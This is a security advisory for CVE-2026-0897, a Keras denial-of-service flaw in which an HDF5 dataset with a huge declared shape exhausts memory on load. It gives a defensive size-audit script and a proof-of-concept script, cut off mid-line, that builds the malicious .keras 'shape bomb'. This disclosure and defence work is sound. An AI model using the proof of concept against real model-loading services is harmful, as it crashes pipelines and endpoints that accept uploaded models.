CVE-2026-0897 - Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petab

📡 GitHub-Advisory · 2026-05-06


GHSA-mgx6-5cf9-rr43 HIGH pip/keras

CVE: CVE-2026-0897

Summary

Keras’s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data. During model loading, Keras executes:

```python
result[key] = value[()]  # loads entire dataset into memory
```

`value[()]` instructs h5py to allocate RAM proportional to the dataset’s declared shape – in this case 8.88 PiB of memory. This results in:

- Immediate memory exhaustion
- Python / TensorFlow crashes
- Jupyter kernel kill
- System instability
- Full Denial of Service on any workload that processes untrusted .keras models

This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.
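One way to reject such a file before Keras opens it, as an added example (not code from the advisory or from Keras): read only the HDF5 metadata of model.weights.h5 and compare each dataset's declared size with a memory budget. The budget constants and all function names here are assumptions.

```python
import io
import math
import zipfile

# Assumed budgets; tune to the largest model you legitimately expect to load.
MAX_WEIGHTS_FILE_BYTES = 4 * 1024**3   # uncompressed size of model.weights.h5
MAX_DATASET_BYTES = 2 * 1024**3        # RAM one dataset may request
MAX_TOTAL_BYTES = 8 * 1024**3          # RAM all datasets together may request

def declared_nbytes(shape, itemsize):
    """Bytes value[()] would allocate: product of declared dims * element size."""
    return math.prod(shape) * itemsize

def audit(datasets, max_dataset=MAX_DATASET_BYTES, max_total=MAX_TOTAL_BYTES):
    """datasets: iterable of (name, shape, itemsize). Returns a list of findings."""
    findings, total = [], 0
    for name, shape, itemsize in datasets:
        need = declared_nbytes(shape, itemsize)
        total += need
        if need > max_dataset:
            findings.append(f"{name}: shape {tuple(shape)} declares {need} bytes")
    if total > max_total:
        findings.append(f"all datasets together declare {total} bytes")
    return findings

def list_datasets(weights_file):
    """Collect (name, shape, itemsize) from HDF5 metadata only; no data is read."""
    import h5py  # lazy import: the size checks above need no third-party package
    found = []
    def visit(name, obj):
        if isinstance(obj, h5py.Dataset):
            # shape is None for a null dataspace; treat it like a scalar
            found.append((name, obj.shape or (), obj.dtype.itemsize))
    with h5py.File(weights_file, "r") as f:
        f.visititems(visit)
    return found

def audit_keras_archive(path):
    """Findings for model.weights.h5 in a .keras zip; empty list = within budget."""
    with zipfile.ZipFile(path) as z:
        info = z.getinfo("model.weights.h5")  # KeyError if the member is absent
        if info.file_size > MAX_WEIGHTS_FILE_BYTES:
            return [f"model.weights.h5 expands to {info.file_size} bytes"]
        raw = z.read(info)
    return audit(list_datasets(io.BytesIO(raw)))
```

Call `audit_keras_archive()` on every untrusted upload and refuse to load the model when the returned list is non-empty.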

Proof of Concept

```python
# PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor

# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
    hdf5_bytes = io.BytesIO()

    # Create an HDF5 file with a huge declared dataset shape
    with h5py.File(hdf5_bytes, "w") as f:
        d = f.create_dataset(
            "payload",
            shape=(50_000_000, 50_000_000),    # Extremely large shape → petabytes on load
            dtype="float32",
            compression="gzip",
            compression_opts=9
        )
        # Write minimal data so the file stays very small
        d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)

    hdf5_bytes.seek(0)

    # Build a valid .keras archive structure
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("config.json", "{}
```
